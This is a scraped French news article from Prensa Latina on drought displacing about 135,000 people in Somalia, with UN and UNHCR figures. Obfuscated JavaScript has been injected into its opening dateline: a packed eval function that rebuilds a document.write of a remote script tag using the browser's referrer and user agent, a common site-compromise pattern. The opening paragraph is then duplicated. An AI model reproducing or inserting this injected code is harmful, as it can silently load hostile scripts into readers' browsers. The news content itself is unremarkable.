lundi 15 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Somalie: la sécheresse déplace environ 135.000 personnes

Mogadiscio, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ksdty|var|u0026u|referrer|iztzb||js|php'.split('|'),0,{})) 23 fév (PL) La grave sécheresse qui frappe la Somalie provoque le déplacement de 135. 000 personnes depuis novembre 2016 et ce chiffre es susceptible d'augmenter selon des fonctionnaires de l'ONU.

Mogadiscio, 23 fév (PL) La grave sécheresse qui frappe la Somalie provoque le déplacement de 135. 000 personnes depuis novembre 2016 et ce chiffre es susceptible d’augmenter selon des fonctionnaires de l’ONU.

D’après des données rassemblées par l’Agence du Haut commissariat des Nations unies pour les réfugiés (Acnur), le Conseil norvégien pour les réfugiés et d’autres organisations, la situation est tellement grave qu’il est impératif de mettre en œuvre de mesures substantielles.

Ces autorités craignent qu’il survienne un sécheresse extrême comme celle de 2011 qui a touché le centre et le sud de cette nation du Corne d’Afrique et qui a causé la mort de 250. 000 personnes dont plus de la moitié étaient de enfants mineurs de 5 ans.

L’Acnur a fait état de 38 décès étant en rapport avec la sécheresse dans la région de Bakool, dans le sud du pays. Des autorités de la région de Pount ont indique que quelques 25.000 familles se sont déplacées ver la zone de Bari alors que d’autres 600. 000 ont besoin des services d’émergence dans la ville de Galkayo, dans le nord du pays.

Les Nation unies, quant à elle, a déclaré que cinq millions de Somalis à peu près ne disposaient pas suffisamment de nourriture dû aux faibles précipitations et aux affrontements armés entre le gouvernement et le groupe terroriste Al Shabab.

Rm/Lp/mgt/dpm

EN CONTINU
notes connexes